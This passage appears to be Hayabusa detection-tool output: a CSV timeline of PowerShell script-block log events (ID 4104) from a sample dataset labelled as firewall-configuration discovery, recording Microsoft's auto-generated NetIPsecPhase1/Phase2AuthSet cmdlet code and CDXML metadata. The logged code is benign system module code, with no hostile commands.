($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetIKEP2AuthSet"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetIPsecPhase2AuthSet</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Name"" CmdletParameterSets=""ByName"" IsMandatory=""true"" Position=""0"" Aliases=""ID""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByDisplayName"" IsMandatory=""true""/> </RegularQuery> </Property> <Property PropertyName=""Description""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PrimaryStatus""> <Type PSType=""NetSecurity.PrimaryStatus""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Status""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSource""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSourceType""> <Type PSType=""NetSecurity.PolicyStoreType""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetConSecRuleEMAuthSet"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecRule""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""TracePolicyStore""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewDisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""Proposals""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]""/> <CmdletParameterMetadata PSName=""Proposal""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata Aliases=""ID"" PSName=""Name"" Position=""0"" IsMandatory=""true"" CmdletParameterSets=""ByName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayName"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayGroup"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayGroup""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" IsMandatory=""true"" CmdletParameterSets=""ByGroup""/> </RegularQuery> </Property> </QueryableProperties> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Remove"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:DeleteInstance""/> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Rename"" ConfirmImpact=""Medium""/> <Method MethodName=""Rename""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Copy"" ConfirmImpact=""Medium""/> <Method MethodName=""CloneObject""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewPolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewPolicyStore""/> </Parameter> <Parameter ParameterName=""NewGPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewGPOSession""/> </Parameter> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> </InstanceCmdlets> <StaticCmdlets> <Cmdlet> <CmdletMetadata Verb=""New"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:CreateInstance""> <Parameters> <Parameter ParameterName=""cim:OperationOption:PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PolicyStore""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""GPOSession""/> </Parameter> <Parameter ParameterName=""InstanceID""> <Type PSType=""string""/> <CmdletParameterMetadata Aliases=""ID"" PSName=""Name""/> </Parameter> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""DisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""RuleGroup""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Group""/> </Parameter> <Parameter ParameterName=""Proposals""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""Proposal""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Default""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata PSName=""Default""/> </Parameter> </Parameters> </Method> </Cmdlet> </StaticCmdlets> </Class> <Enums> 